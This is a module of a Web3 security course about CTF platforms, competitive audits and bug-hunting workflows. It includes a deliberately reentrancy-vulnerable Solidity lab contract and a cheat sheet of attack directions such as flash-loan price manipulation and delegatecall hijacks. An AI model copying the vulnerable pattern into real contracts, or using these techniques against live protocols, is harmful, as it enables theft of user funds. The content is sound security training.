Module 10 — CTF & Wargames

Difficulty: Beginner → Advanced

Hands-on practice is the fastest way to internalize Web3 security concepts. This module covers every major CTF platform, competitive audit arena, and practice resource with solving strategies and pattern recognition techniques.

10.1 Ethernaut (OpenZeppelin)

URL: ethernaut.openzeppelin.com

Ethernaut is the definitive starter CTF for blockchain security. 30+ levels covering fundamental vulnerability classes.

Level Categories & Solving Approach

Category	Levels	Key Skills
Basic Ethereum	0-3 (Hello, Fallback, Fallout, Coin Flip)	Wallet interaction, fallback functions, randomness
Access Control	4-6 (Telephone, Token, Delegation)	`tx.origin` vs `msg.sender`, overflow, delegatecall
Storage & Basics	7-10 (Force, Vault, King, Re-entrancy)	Force ETH, private storage, DoS, reentrancy
Advanced	11-20 (Elevator, Privacy, GatekeeperOne/Two, …)	Interface tricks, storage layout, gas manipulation
Expert	21+ (Shop, Dex, Puzzle Wallet, Motorbike, …)	View manipulation, DEX math, proxy attacks

Solving Methodology

For each Ethernaut level:
1. READ the contract source code completely
2. IDENTIFY what the "win condition" requires
3. MAP the vulnerability class (check [Module 03](/Hack_web3/modules/SMART_CONTRACT_VULNERABILITIES.html))
4. PLAN the exploit (which cheatcode/pattern to use)
5. WRITE interaction code (Foundry, cast, or browser console)
6. EXECUTE on the testnet instance
7. VERIFY with the Submit Instance button

Example — Level 4 (Telephone):
- Win condition: Claim ownership
- Vulnerability: tx.origin vs msg.sender confusion
- Solution: Call through an intermediary contract
  → msg.sender = intermediary, tx.origin = you

Common Ethernaut Patterns

Pattern	Levels It Appears
`tx.origin` authentication bypass	Telephone
Integer overflow (pre-0.8.x)	Token
`delegatecall` context preservation	Delegation, Puzzle Wallet
Private storage is publicly readable	Vault, Privacy
Force-send ETH via selfdestruct	Force, King
EVM gas mechanics	GatekeeperOne
Proxy storage collision	Puzzle Wallet, Motorbike

10.2 Damn Vulnerable DeFi (tinchoabbate)

URL: damnvulnerabledefi.xyz

DvD is the gold standard for DeFi-specific challenges. More complex than Ethernaut, focused on DeFi primitives.

Challenge Categories

Category	Challenges	Concepts
Flash Loans	Unstoppable, Naive Receiver, Truster, Side Entrance	Flash loan mechanics, callback exploitation
Token/NFT	The Rewarder, Selfie, Compromised	Token manipulation, reward distribution
Lending	Puppet, Puppet V2, Free Rider	Oracle manipulation, flash loan price manipulation
Governance	Selfie, Backdoor	Flash loan governance, GnosisSafe abuse
Bridges & Advanced	Climber, Wallet Mining, ABI Smuggling	Timelock bypass, CREATE2, ABI edge cases

Approach for Each Challenge

Read the README and understand the goal
Read ALL contracts in the challenge, including tests
Understand the "success condition" in the test file
Identify the invariant that you need to break
Write the exploit in the test framework provided
Run: forge test --mt test_challengeName -vvvv

Challenge Hints (Spoiler-Free Approaches)

Challenge	Approach Hint
Unstoppable	How can you break the flash loan invariant without using the pool?
Naive Receiver	Who pays for the flash loan fee?
Truster	What can you do during the flash loan callback?
Side Entrance	Can you deposit into the pool during a flash loan?
The Rewarder	When are reward snapshots taken?
Selfie	Can you acquire governance power temporarily?
Puppet	What price source does the pool use?
Free Rider	Can you buy NFTs with the marketplace’s own funds?
Climber	What order does the timelock check things?

10.3 Paradigm CTF

URL: Historical challenges available on GitHub

Paradigm CTFs feature cutting-edge challenges that go beyond typical vulnerability patterns.

Notable Challenge Types

Category	Description	Skills Required
EVM puzzles	Exploit opcodes directly	Bytecode, assembly
DeFi challenges	Complex protocol attacks	Flash loans, AMM math
Cross-chain	Multi-chain exploitation	Bridge understanding
ZK challenges	Circuit vulnerabilities	Zero-knowledge basics
Meta-game	Challenge infrastructure exploitation	Out-of-the-box thinking

Study Resources

Paradigm CTF Solutions:
- https://github.com/paradigmxyz/paradigm-ctf-2023
- Community writeups on Mirror, Medium, and personal blogs
- cmichel's writeups: cmichel.io
- samczsun's blog: samczsun.com

10.4 Competitive Audit Platforms

Code4rena

URL: code4rena.com

Aspect	Details
Format	Time-limited competitive audits (3–21 days)
Payout	Shared prize pool, split among valid unique findings
Severity	High, Medium (paid), QA/Gas (small reward)
Good for	Building track record, learning from judging

Approaching a Code4rena Contest:

Day 1: Full codebase scan, Slither run, understand architecture
Day 2-3: Deep manual review of core contracts
Day 4-5: Focus on economic attack vectors and edge cases
Day 6-7: Write findings and PoCs

Sherlock

URL: sherlock.xyz

Aspect	Details
Format	Time-limited with lead senior auditor (LSA)
Payout	Based on finding uniqueness and severity
Judging	LSA judges + escalation process
Good for	Higher quality judging, clearer rules

CodeHawks (Cyfrin)

URL: codehawks.com

Aspect	Details
Format	Competitive audits + First Flights (beginner-friendly)
Payout	Prize pool per contest
Good for	Beginners (First Flights), structured learning path

Immunefi Bug Bounties

URL: immunefi.com

Aspect	Details
Format	Ongoing bug bounties on live protocols
Payout	Up to $10M+ for critical findings
Good for	Real-world impact, highest payouts

10.5 Additional Practice Platforms

Platform	Focus	Difficulty	URL
OnlyPwner	Smart contract CTF challenges	-	onlypwner.xyz
EVM Puzzles	Opcode-level puzzles	-	github/fvictorio/evm-puzzles
Capture the Ether	Classic Ethereum CTF		capturetheether.com
DeFi Hack Labs	Reproduce real exploits		github/SunWeb3Sec/DeFiHackLabs
Mr Steal Yo Crypto	DeFi attack challenges	-	mrstealyocrypto.xyz
Secureum RACE	Quiz-style solidity security		secureum.substack.com

10.6 Building Your Own Vulnerable Lab

Quick Foundry-Based Lab

# Create a lab project
forge init vuln-lab && cd vuln-lab

# Create vulnerable contracts
mkdir -p src/challenges

# Run your lab against test exploits
forge test -vvvv

// src/challenges/ReentrancyChallenge.sol
contract ReentrancyChallenge {
    mapping(address => uint256) public balances;
    bool public solved;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Intentionally vulnerable
    function withdraw() external {
        uint256 balance = balances[msg.sender];
        (bool success, ) = msg.sender.call{value: balance}("");
        require(success);
        balances[msg.sender] = 0;
    }

    function isSolved() external view returns (bool) {
        return address(this).balance == 0 && solved;
    }
}

10.7 CTF Pattern Recognition Cheat Sheet

Pattern You See	Vulnerability	Solution Direction
External call before state update	Reentrancy	Write attack contract with receive() callback
`tx.origin` in require	Access control bypass	Call through intermediary contract
`block.timestamp` / `block.number` in logic	Timestamp/block manipulation	As validator or use `vm.warp`/`vm.roll`
`delegatecall` to user input	Code execution hijack	Point to your malicious contract
Private state variable	False sense of privacy	Read storage directly via `getStorageAt`
Solidity < 0.8.0 + arithmetic	Integer overflow	Trigger wrap-around
`transfer` / `send` for ETH	Gas limitation + DoS	Contract without receive() to DoS
No slippage check on swap	Price manipulation	Flash loan + dump to manipulate price
Upgradeable without initializer guard	Uninitialized impl	Call initialize() on implementation directly
ERC20 with callbacks (ERC-777)	Reentrancy via token hooks	Transfer tokens to trigger hook re-entry

10.8 Speed Auditing Techniques for Competitions

Time-Optimized Workflow

Minutes 0-30: RAPID SCAN
├── Read README/docs (understand the protocol intent)
├── List all external/public functions
├── Run Slither (background)
├── Run Aderyn (background)
└── Note down contract sizes and inheritance

Minutes 30-120: DEEP DIVE ON CRITICAL CONTRACTS
├── Follow the money (deposit → internal logic → withdrawal)
├── Check all access control
├── Look for external calls (reentrancy surface)
├── Check oracle interactions
└── Review token handling (fee-on-transfer, rebasing)

Minutes 120-180: ATTACK BRAINSTORMING
├── Can I manipulate an oracle with a flash loan?
├── Can I reenter during any callback?
├── Can I bypass access control?
├── Are there rounding errors in share calculations?
├── What happens at extreme values (0, type(uint256).max)?
└── What if two functions are called in the same transaction?

Minutes 180+: POC WRITING
├── Write Foundry test for each finding
├── Classify severity
└── Submit

Quick Wins Checklist (Things to Check First)

Missing access control on state-changing functions
Unchecked return values on call, transfer, transferFrom
approve followed by transferFrom without balance check
Oracle price without staleness validation
Division before multiplication (precision loss)
Missing initializer modifier on upgradeable contracts
delegatecall to user-controlled address
selfdestruct accessible
Missing nonReentrant on functions with external calls + state updates

Key Takeaway: The best way to get fast at finding bugs is volume. Solve every Ethernaut level, complete Damn Vulnerable DeFi, then jump into competitive audits. After your first 5–10 contests, you’ll develop pattern recognition that makes you exponentially faster. The difference between finding 1 bug and finding 10 bugs in a contest is not 10x skill — it’s having seen the patterns before.

*← Previous: MEV & Mempool

Next: Reporting & Disclosure →*